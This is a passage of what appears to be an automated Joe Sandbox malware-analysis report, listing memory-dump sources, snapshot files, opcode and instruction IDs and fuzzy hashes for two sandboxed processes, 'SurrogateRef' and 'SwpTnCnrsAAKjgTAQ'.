                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d23006560a12d3a1a4ae6f3062e220424897e1b652935191712dc27ba5e848c5
                • Instruction ID: 7fe0df72e8d7cfcda7d6dacf9663eecadd23e4689aa5fa5411967736104cb172
                • Opcode Fuzzy Hash: d23006560a12d3a1a4ae6f3062e220424897e1b652935191712dc27ba5e848c5
                • Instruction Fuzzy Hash: 71510A70E1892D8EEB94EF58C4A56EDBBE1FF5A310F50013AD10DE7291DE3CA8419B50
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8824b197b369295dbf4c001b6047bab8ec368d0c6e76171e8e0c02c8acfcb3b2
                • Instruction ID: 7647e3f656a405b9098a47cf45b4106718aeac8d8e148d101c0cd7b70158600f
                • Opcode Fuzzy Hash: 8824b197b369295dbf4c001b6047bab8ec368d0c6e76171e8e0c02c8acfcb3b2
                • Instruction Fuzzy Hash: 3A514B70E086598EEB54EFA8C4A56EDBBF1EF9A320F004079D109E7291DA3C6984DB40
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91f5018d547f38a5bbb16131c377871803c545f1d6cd16f14ddde0b3d32fb5b1
                • Instruction ID: 8192c5628d38663b02a09f5180f7278eb6d7b16a91c7e2d454d57868e69272f3
                • Opcode Fuzzy Hash: 91f5018d547f38a5bbb16131c377871803c545f1d6cd16f14ddde0b3d32fb5b1
                • Instruction Fuzzy Hash: 17413331B0CA9A4FE755ABB898A51F8B7E0EF87320B0444B7D64EC3192DE2CA841C741
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6510440b5383b535ab6517420500787eca6a1e15166bc0854fac0ebcddaeca92
                • Instruction ID: 5732f84cad7d9110185c972afee004fb987643788ba1c8c7f0349dd0ec64ba5b
                • Opcode Fuzzy Hash: 6510440b5383b535ab6517420500787eca6a1e15166bc0854fac0ebcddaeca92
                • Instruction Fuzzy Hash: 7C41D371F1D96A8FE741AFB888A81FD7BE1FF56320F0445BAC15CC6093EE2CA8058640
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 00a9a630da56438b62a40f9ac473cd45a43416778a4a920a3bc60ba9a9ead2c9
                • Instruction ID: c0dade504625013df96f72e6cabd2bfa8e73f6088fb5bcd136eb6e1e1ee05c70
                • Opcode Fuzzy Hash: 00a9a630da56438b62a40f9ac473cd45a43416778a4a920a3bc60ba9a9ead2c9
                • Instruction Fuzzy Hash: 5041EC70E0962A8AEB64EF14C8A17FC7270FF46320F1051B9C64FE6192DF7C2985AA41
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff5bf7fb0368e9c1bfc13e3ffcbd94a4d906c3393699f0a24e9c7680e251a424
                • Instruction ID: 6ed4cdb0754330bacb95c295d6c242b8a11c2621a6b5f5505fb5713850f57376
                • Opcode Fuzzy Hash: ff5bf7fb0368e9c1bfc13e3ffcbd94a4d906c3393699f0a24e9c7680e251a424
                • Instruction Fuzzy Hash: 7C318131E1891A8BEB64EF54C8A5BED73A1FF55310F1082B9C50DE7192DF3CA9469B80
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d35cbb74110ff161527ba934c716fae927860ff3a2380b5de03ff697ce982ea
                • Instruction ID: 7aa0ddef8b7caa0fb86c191f46c443a78d91c06e88126dfd46214fe70abf75de
                • Opcode Fuzzy Hash: 8d35cbb74110ff161527ba934c716fae927860ff3a2380b5de03ff697ce982ea
                • Instruction Fuzzy Hash: 86218C71F186598FDB84EFA4C8A56FDB7B1FF5A320F00417AE10AE3192CE2C2840DA51
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1bb191529c9e22be975a2a315e1c361af974979fcde4dfb6ed199d178dab1ef
                • Instruction ID: d59c044af2c82e544a339d60031a06990ee41e448108bd22b36834f7dbe73284
                • Opcode Fuzzy Hash: d1bb191529c9e22be975a2a315e1c361af974979fcde4dfb6ed199d178dab1ef
                • Instruction Fuzzy Hash: DC216F70A0864D8FDB45EF28C895AE93BF1FF6A315F0145AAE409C7251DB34A440CB41
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 777cabd4a084778805c018d57dfa95fe5549fc438e0fc2e8f3accd6b1cf3858a
                • Instruction ID: 904055cc5579d91d21a24ab7b832fada8b2de6d1f4808a45e56878af21db1628
                • Opcode Fuzzy Hash: 777cabd4a084778805c018d57dfa95fe5549fc438e0fc2e8f3accd6b1cf3858a
                • Instruction Fuzzy Hash: F3215E3094D79A8FD743ABB088686E97FF4EF47310B0544E6D449CB0A3DA2C9985D722
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e76606e1cd66c9f4bdb8e32fbebc7fed372772f85bbdab4345c760127f8cd381
                • Instruction ID: 79e2da8fac2fbe1bc61b206d01c788947ec0ac0d25f187b554a2811e8edfd3ff
                • Opcode Fuzzy Hash: e76606e1cd66c9f4bdb8e32fbebc7fed372772f85bbdab4345c760127f8cd381
                • Instruction Fuzzy Hash: 65110431B0CA9A9FEB51EB7888A90E97BE0EF17314F0444BAC44DC7093EE2CE445C681
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f67c976d109a9606b353fc3cb67557a42bd42e860c453a6ca9c27f5494372ff4
                • Instruction ID: 6d98f611c4bacb99ab93d56c3fcfde99b8a341a9e7eea877bb04947f05ded03b
                • Opcode Fuzzy Hash: f67c976d109a9606b353fc3cb67557a42bd42e860c453a6ca9c27f5494372ff4
                • Instruction Fuzzy Hash: 63110831E1D6BB8AE751AFA898B41FE7BE1EF46714F04447AD14CD60D3ED2C68018640
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0eb6c025d3e7c6d55908f346894913eb2f982edaf06998a1c0177e06b3c12768
                • Instruction ID: bfba44ed9f0e4dda212a976f907c6b81091b98d5e471a48d0c11c8aae455a08f
                • Opcode Fuzzy Hash: 0eb6c025d3e7c6d55908f346894913eb2f982edaf06998a1c0177e06b3c12768
                • Instruction Fuzzy Hash: A6018B30A5865A9FE751BF6488A96FA77E0EF5A310F0188B2D50DC70A2EF3CA650D601
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b432e03b00cb39e34782cfa5ba61b71332736aed4a5c5b79e856f58c9f615b1
                • Instruction ID: 4693d302e32d2282d69d72a0fbcb7f5af5c867848467be422d1ba8e0717c8ed3
                • Opcode Fuzzy Hash: 2b432e03b00cb39e34782cfa5ba61b71332736aed4a5c5b79e856f58c9f615b1
                • Instruction Fuzzy Hash: 88018C70A0891E8FEB98EF24C4A46FD77A1EF5A315F50847AD40EC3191CA3EA561DB40
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa0a8677102245f4660c9f54b43ca67d8a9b9132497228941d1b8f5e0bdda6b5
                • Instruction ID: 7c4cb5f4e9cd9e0534e5b6697a5294fd983847aa39bf718064e32b79a22e1874
                • Opcode Fuzzy Hash: fa0a8677102245f4660c9f54b43ca67d8a9b9132497228941d1b8f5e0bdda6b5
                • Instruction Fuzzy Hash: 02018F30A4D64A5FE752BB7488A96E93BE0EF4A320F0549F2D409CB0A3EA3CA554D701
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: da1c9dca559cd30c68c60e7dccab4403c64ea953b3e35e5a52167e30cb9d35b3
                • Instruction ID: 2a54136dea366efba15d07471ffb14820e93d8a93cd84d3100f1954f6682cae3
                • Opcode Fuzzy Hash: da1c9dca559cd30c68c60e7dccab4403c64ea953b3e35e5a52167e30cb9d35b3
                • Instruction Fuzzy Hash: F501B131A0D6A99FE752EF2488A95E97BE0FF1B310F0644F6D508C7092EA2CA458D701
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4794716f4c8f1fc90ffb95ad9ac3c6e1dc427651895b23274a49c24248aa3c0
                • Instruction ID: f8871faf27585d20322e8428140aa72bb66a312066085d75c7cf432c1b5375c3
                • Opcode Fuzzy Hash: f4794716f4c8f1fc90ffb95ad9ac3c6e1dc427651895b23274a49c24248aa3c0
                • Instruction Fuzzy Hash: 8801DF30A08A5D8FE791FF2488A85E97BF0EF1A310F4145BAD50DC70A2EA3CE044D741
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 47112bbc59d693854c29913ce864fb02394863ccd11606d91002f3a0cf6ac155
                • Instruction ID: 09ab2c306e9cdcc8cab704ed9b0c3762bd0aa93e8daf2c7cbb3fb00d09f5930b
                • Opcode Fuzzy Hash: 47112bbc59d693854c29913ce864fb02394863ccd11606d91002f3a0cf6ac155
                • Instruction Fuzzy Hash: AD016D30A1890E8AEB58FF64C4A86FA77A0FF1A315F10487ED40FC21D1DE3DA550D610
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c59126c8f3b4dad1078d4379ae7919fa942c546b266b6b16d636437a3e408354
                • Instruction ID: 554ca1c7fe25386dc97b03b582aef011258d147e04946074b6713fc3adf02411
                • Opcode Fuzzy Hash: c59126c8f3b4dad1078d4379ae7919fa942c546b266b6b16d636437a3e408354
                • Instruction Fuzzy Hash: 97016D30A1450E9AEB58FF64C4A8AF977A0FF1A315F10487ED41FC21D1DE3DA150D640
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f01ccc82bd6cd590b78a7b3985e8d442be3180142d051c5f492d8d222b7367a4
                • Instruction ID: ec2e0c173d2c41db46a623564a78073b63d8e6fa55a378901908acdef02e323c
                • Opcode Fuzzy Hash: f01ccc82bd6cd590b78a7b3985e8d442be3180142d051c5f492d8d222b7367a4
                • Instruction Fuzzy Hash: F2F0F630A09A5E8FEB94EF64C4A56FE37A4EF56315F00443AE84DC3091CE3DA460DB80
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5143be62e49e0ecfe19d92f8a71a345d4aa8e6ec141459d0ed8e4ce23c56f20b
                • Instruction ID: 9872788494a8fc5dbd85ea95c07d884778abd91ea85ad6b67f22f3e08d9b697f
                • Opcode Fuzzy Hash: 5143be62e49e0ecfe19d92f8a71a345d4aa8e6ec141459d0ed8e4ce23c56f20b
                • Instruction Fuzzy Hash: F101D170A09A8D8FEB99DF2484A52FD7BA1EF56310F4140BAD948C3092CA3E9460D780
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a71db46ed069c2a49e4d3b50fe4f62c06aa322d84b40933e6e94d76e175c983
                • Instruction ID: 1e9e81fbee28c0b365246ff15aa78ef7673044148aa0dc86812678b0169d1803
                • Opcode Fuzzy Hash: 7a71db46ed069c2a49e4d3b50fe4f62c06aa322d84b40933e6e94d76e175c983
                • Instruction Fuzzy Hash: 1EF0903094D78D8FEB59AF6088656EA3BA0BF56311F4104BAE80AC61D2EB3C9554D741
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0dd1cba3399312284e85c933111a956fcbd23aa91e73951a9d9a2d9788051881
                • Instruction ID: ce9aeda556cae3b6d0ac98d1eb36d476b5929f2c4167f74f76be35b17e102e07
                • Opcode Fuzzy Hash: 0dd1cba3399312284e85c933111a956fcbd23aa91e73951a9d9a2d9788051881
                • Instruction Fuzzy Hash: 27F0C23090D7894FE75AAF2488752E93FA0FF07211F4504BAD50AC60D2DA3CA414D741
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29f02e2d49d65d6890d70ced74a864c7bf1baf50128cb88b1d4e14c6dea6634a
                • Instruction ID: 9b5a17c65799342a3b0003aa2ef0220d6fd5bb13e57341847f25a12f185d0a80
                • Opcode Fuzzy Hash: 29f02e2d49d65d6890d70ced74a864c7bf1baf50128cb88b1d4e14c6dea6634a
                • Instruction Fuzzy Hash: 05F0AC30A08529CEEB64EF14C8A5BE973B1FB95310F0006B9C50AD7192DF7C6A44DA40
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 84605326ed0a60f7567bcfb6c830de7c18f10182b1580c7c079d930b5a7be4f0
                • Instruction ID: 1c9d68633a080d4217b8c88185abcd34dfdc3c086156bf3c15518b661d042e54
                • Opcode Fuzzy Hash: 84605326ed0a60f7567bcfb6c830de7c18f10182b1580c7c079d930b5a7be4f0
                • Instruction Fuzzy Hash: 53B1AE71A08A5D8FEB95DB68C8687ED7BE1FF9A310F4001BAD00DD72D6DA6968418700
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b978959290ac23485ba313e8a7a9f2e677318286edaabdd7b9347e16330170b5
                • Instruction ID: f55d3884375278aaa020ab2c7c0cfb190c454173079e985e38f206c0282232c0
                • Opcode Fuzzy Hash: b978959290ac23485ba313e8a7a9f2e677318286edaabdd7b9347e16330170b5
                • Instruction Fuzzy Hash: 6C81A171F1CA8D8FEB95DB98C8653E87BE1FB96314F4001BAD04DD72D6DAA928458700
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID: 2En4
                • API String ID: 0-3623686785
                • Opcode ID: 1f98944abdf79046666cbdf269a06c07986fdda4d762fb4976ee6da0eba8a671
                • Instruction ID: 6caaf26476301090aadab4bd70335acce55e88203c1f3548404a3f9bd9ca9036
                • Opcode Fuzzy Hash: 1f98944abdf79046666cbdf269a06c07986fdda4d762fb4976ee6da0eba8a671
                • Instruction Fuzzy Hash: 80819F31F0CA594BDB59DE1C88A55F977E2EFD9304B1441AAE59ED3292CE38AC028781
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID: 0vT4
                • API String ID: 0-2121293754
                • Opcode ID: d02435ded21c84195301b794f91a7e7ff85fd695ab63bd9f83bbfad7b06eba43
                • Instruction ID: 79eadafddd7af6b45448220ff16d36948763bc4ea0d32795197d53d250c14a8a
                • Opcode Fuzzy Hash: d02435ded21c84195301b794f91a7e7ff85fd695ab63bd9f83bbfad7b06eba43
                • Instruction Fuzzy Hash: 0B119D70A18A1E5FE780EF6888995EE77E0FF5A300F4045B6D40DC6192EE38A9449700
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID: hyT4
                • API String ID: 0-2073378762
                • Opcode ID: 2f16be763cc39c3d75ed9a31fa996bb259ad0ff18601574b768a812af9dd1c13
                • Instruction ID: 63dcea3bfeb7fb030d231cde5680a17250d8cd5b1b42ce5cb7682dc722c9695f
                • Opcode Fuzzy Hash: 2f16be763cc39c3d75ed9a31fa996bb259ad0ff18601574b768a812af9dd1c13
                • Instruction Fuzzy Hash: EA119D70E0D95A4EEB59EFA498A86F97BE0EF5A300F0004FED10ED71D2EE396584D600
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID: hyT4
                • API String ID: 0-2073378762
                • Opcode ID: af3d1757395e9ce45565ce31d2b1445a9eaf4bb4681af25838e054f30c170db5
                • Instruction ID: 2d1d73f21d63daa51630c5625d9ecf5e6cd5ac092997b95ae23438fa3397090b
                • Opcode Fuzzy Hash: af3d1757395e9ce45565ce31d2b1445a9eaf4bb4681af25838e054f30c170db5
                • Instruction Fuzzy Hash: 97F02870E1D92E49EB589FA498A83F973E4FF46300F0000BEE40ED20C1DF381444D600
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 044cda5c9a36d7d8d3843130c53d01617c62f79d851a3abb723d854f0eef9bac
                • Instruction ID: 2389246fdacbeb249ca4df2735f730852f866d314f45cb206bb9f568c73995e4
                • Opcode Fuzzy Hash: 044cda5c9a36d7d8d3843130c53d01617c62f79d851a3abb723d854f0eef9bac
                • Instruction Fuzzy Hash: 8C51C431B08A994FDB58DE1888A55FA77E2FFD9314B1442BED55AC7281CE38EC028781
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e7cc50c1c35c033b53ab07248c0f232b5fc8d1c932cb33d858183188d1a85497
                • Instruction ID: fb4858e37a2a29c9e483c6ab842d85ec51e0d34e0fe69d11a2e19caab4a49e55
                • Opcode Fuzzy Hash: e7cc50c1c35c033b53ab07248c0f232b5fc8d1c932cb33d858183188d1a85497
                • Instruction Fuzzy Hash: 10515B70E0865D8FEB54EF98D4A46FDBBF1EF9A300F0040B9D109E7292DA386884DB40
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b3d6d1f036db2e5ad625d0d7be48fb48388176d353b03a5fabbefb5aacc8b7ae
                • Instruction ID: 1ad6518e7063ca452bb5168c5c743ff767b6d1780c798f7549679e6124c983fd
                • Opcode Fuzzy Hash: b3d6d1f036db2e5ad625d0d7be48fb48388176d353b03a5fabbefb5aacc8b7ae
                • Instruction Fuzzy Hash: B5412431B0DA5A4FE765ABB888A51FA77E0EF87310B0541F7D24EC3192DE2CA841C751
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bae9473456f5c2cf443289e1307feb04b186919c8c3aac857209e10f3c1e0855
                • Instruction ID: ec67aa7edcc4ce4eb77995723ce94fe9aaeeb9fcf34c36c2e93de3589c50133b
                • Opcode Fuzzy Hash: bae9473456f5c2cf443289e1307feb04b186919c8c3aac857209e10f3c1e0855
                • Instruction Fuzzy Hash: 3B41DE61F1D99A4FE745AFB888A81FD7BE0FF56300F0845FAD15CC7093EE29A8059600
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 00a9a630da56438b62a40f9ac473cd45a43416778a4a920a3bc60ba9a9ead2c9
                • Instruction ID: 96f7f31b96fb391eefc05e1ea56a30634572df90a0ffb3e9cbf03c1176d90b41
                • Opcode Fuzzy Hash: 00a9a630da56438b62a40f9ac473cd45a43416778a4a920a3bc60ba9a9ead2c9
                • Instruction Fuzzy Hash: 9641DB70E1863A8AEB649F10C8A57FC72B1BF56300F1051F9C25EE2292DF7C6985AF41
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1be6d250ab6c35a68d95d12523e1d5901423a2a44220c946e3cc55d6419e719d
                • Instruction ID: 6c528dbb064b5b175c67dd505a40f46337990ab89d0043bdaf632fd4e378ed2e
                • Opcode Fuzzy Hash: 1be6d250ab6c35a68d95d12523e1d5901423a2a44220c946e3cc55d6419e719d
                • Instruction Fuzzy Hash: E2316F31E1891A8BEB64EF54C8A4BED73A1FF55300F5082B5C50DE7296DE38AD469B80
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3da4699ed26d2a5d6539e95c0c219f0a555dba93889bba6a188e2e1f6b06f980
                • Instruction ID: 6031b73830dcba8a17f3c03a063158389aff8ff59ded5e952bdb8a454f134722
                • Opcode Fuzzy Hash: 3da4699ed26d2a5d6539e95c0c219f0a555dba93889bba6a188e2e1f6b06f980
                • Instruction Fuzzy Hash: AB21C271E0852D8EEB54DF98D4A56FCBBF1EF99301F5040BAD10AE7291CA386880EB50
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffd34650000_SwpTnCnrsAAKjgTAQ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ef5d104dce9af40efbf77338b9e8ca7cd9592b7852ece54e3a9fd29ab5b6171
                • Instruction ID: 845f46337d6aa04f008df875efc63cfd8432f9a15bd4113b42455951ffdfeadf
                • Opcode Fuzzy Hash: 2ef5d104dce9af40efbf77338b9e8ca7cd9592b7852ece54e3a9fd29ab5b6171
                • Instruction Fuzzy Hash: A321AF71E1C6598FDB85EFA4C8A56FDBBB1FF5A310F0041BAE10AE3192CE282440DB51
                Memory Dump Source
                • Source File: 0000000E.00000002.2493828091.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
